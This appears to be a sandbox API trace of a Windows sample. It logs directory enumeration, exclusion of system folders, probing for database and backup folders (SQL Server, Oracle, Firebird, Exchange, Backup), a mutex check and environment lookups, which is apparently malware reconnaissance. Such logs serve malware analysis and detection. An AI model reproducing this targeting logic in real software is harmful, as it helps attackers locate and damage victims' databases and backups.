dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 28 [0103.672] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=10, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 10 [0103.673] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=8, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 8 [0103.673] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 9 [0103.673] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.673] SHGetMalloc (in: ppMalloc=0x18f78c | out: ppMalloc=0x18f78c*=0x767666bc) returned 0x0 [0103.673] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f788 | out: ppidl=0x18f788) returned 0x0 [0103.674] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.675] SysReAllocStringLen (in: pbstr=0x18f810*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f810*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.675] IMalloc:Free (This=0x767666bc, pv=0x578208) [0103.675] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0103.675] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0103.675] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.675] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.675] GlobalUnlock (hMem=0x45000c) returned 0 [0103.675] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.675] GlobalLock (hMem=0x450004) returned 0x588000 [0103.675] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.675] GlobalUnlock (hMem=0x45000c) returned 0 [0103.675] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.675] GlobalUnlock (hMem=0x450004) returned 0 [0103.675] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577df0 [0103.676] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.676] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0103.676] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0103.676] GetLastError () returned 0x12 [0103.676] FindClose (in: hFindFile=0x577df0 | out: hFindFile=0x577df0) returned 1 [0103.676] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.676] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.676] GlobalUnlock (hMem=0x450004) returned 0 [0103.676] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.676] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.676] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.676] GlobalUnlock (hMem=0x450004) returned 0 [0103.676] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.676] GlobalUnlock (hMem=0x45000c) returned 0 [0103.676] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577df0 [0103.676] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f788 | out: lpLocalFileTime=0x18f788) returned 1 [0103.677] FileTimeToDosDateTime (in: lpFileTime=0x18f788, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0103.677] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.677] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.677] GlobalUnlock (hMem=0x45000c) returned 0 [0103.677] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.677] GlobalLock (hMem=0x450004) returned 0x588000 [0103.677] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.677] GlobalUnlock (hMem=0x45000c) returned 0 [0103.677] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.677] GlobalUnlock (hMem=0x450004) returned 0 [0103.677] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.677] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.677] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f784 | out: lpLocalFileTime=0x18f784) returned 1 [0103.677] FileTimeToDosDateTime (in: lpFileTime=0x18f784, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0103.677] GlobalLock (hMem=0x450004) returned 0x570108 [0103.677] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.677] GlobalUnlock (hMem=0x450004) returned 0 [0103.677] GlobalLock (hMem=0x450004) returned 0x570108 [0103.677] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.677] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.677] GlobalUnlock (hMem=0x450004) returned 0 [0103.677] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.678] GlobalUnlock (hMem=0x45000c) returned 0 [0103.678] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.678] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0103.678] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f784 | out: lpLocalFileTime=0x18f784) returned 1 [0103.678] FileTimeToDosDateTime (in: lpFileTime=0x18f784, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0103.678] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.678] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.678] GlobalUnlock (hMem=0x45000c) returned 0 [0103.678] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.678] GlobalLock (hMem=0x450004) returned 0x588000 [0103.678] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.678] GlobalUnlock (hMem=0x45000c) returned 0 [0103.678] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.678] GlobalUnlock (hMem=0x450004) returned 0 [0103.678] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.678] GlobalLock (hMem=0x450004) returned 0x570108 [0103.678] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.678] GlobalUnlock (hMem=0x450004) returned 0 [0103.678] GlobalLock (hMem=0x450004) returned 0x570108 [0103.678] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.678] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.678] GlobalUnlock (hMem=0x450004) returned 0 [0103.678] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.679] GlobalUnlock (hMem=0x45000c) returned 0 [0103.679] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.679] SysReAllocStringLen (in: pbstr=0x18f784*=0x0, psz="C:\\PerfLogs\\Admin", len=0x11 | out: pbstr=0x18f784*="C:\\PerfLogs\\Admin") returned 1 [0103.679] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.679] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.679] GlobalUnlock (hMem=0x45000c) returned 0 [0103.679] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.679] GlobalLock (hMem=0x450004) returned 0x588000 [0103.679] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.679] GlobalUnlock (hMem=0x45000c) returned 0 [0103.679] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.679] GlobalUnlock (hMem=0x450004) returned 0 [0103.679] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Microsoft\\Exchange Server", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="䱈@纄W繘W企@\x18㵤V\x18\x1b")) returned 0xffffffff [0103.679] GetLastError () returned 0x3 [0103.679] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.679] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d310, cbMultiByte=26, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\暼癶罀W\x18޾疥罀W") returned 21 [0103.680] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Microsoft SQL Server", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@縴W企@\x18㮴V\x181")) returned 0xffffffff [0103.680] GetLastError () returned 0x2 [0103.680] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d310, cbMultiByte=21, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\暼癶罀W\x18޾疥罀W") returned 9 [0103.681] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Firebird", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@紌X企@\x18㥔X\x18;")) returned 0xffffffff [0103.681] GetLastError () returned 0x2 [0103.681] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.681] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99a8, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.681] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\暼癶罀W\x18޾疥罀W") returned 8 [0103.681] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\MSSQL.1", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㵤V企@\x18㥼X\x18D")) returned 0xffffffff [0103.681] GetLastError () returned 0x2 [0103.682] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99a8, cbMultiByte=8, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0103.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0103.682] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㮴V企@\x18縴W\x18j")) returned 0xffffffff [0103.682] GetLastError () returned 0x2 [0103.682] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=37, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0103.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0103.683] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Adobe", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㊼W企@\x18㥔X\x18q")) returned 0xffffffff [0103.683] GetLastError () returned 0x2 [0103.714] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.714] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="adobe\\縰WP") returned 6 [0103.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0103.857] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Oracle", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㵤V企@\x18㥼X\x18y")) returned 0xffffffff [0103.857] GetLastError () returned 0x2 [0103.857] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0103.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0103.858] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Archive", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㷴V企@\x18㥔X\x18\x81")) returned 0xffffffff [0103.858] GetLastError () returned 0x2 [0103.858] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0103.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0103.858] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Backup", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㵤V企@\x18㥼X\x18\x88")) returned 0xffffffff [0103.858] GetLastError () returned 0x2 [0103.859] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.859] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="backup㥐X\x10") returned 6 [0103.859] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0103.859] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Reserv", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㷴V企@\x18㥔X\x18\x8f")) returned 0xffffffff [0103.859] GetLastError () returned 0x2 [0103.859] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.859] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="reserv㥸X\x10") returned 6 [0103.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0103.860] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Restore", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㵤V企@\x18㥼X\x18\x97")) returned 0xffffffff [0103.860] GetLastError () returned 0x2 [0103.860] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0103.860] GlobalLock (hMem=0x450004) returned 0x570108 [0103.860] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.860] GlobalUnlock (hMem=0x450004) returned 0 [0103.861] GlobalLock (hMem=0x450004) returned 0x570108 [0103.861] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.861] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.861] GlobalUnlock (hMem=0x450004) returned 0 [0103.861] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.861] GlobalUnlock (hMem=0x45000c) returned 0 [0103.861] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.861] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0103.861] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.861] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0103.862] 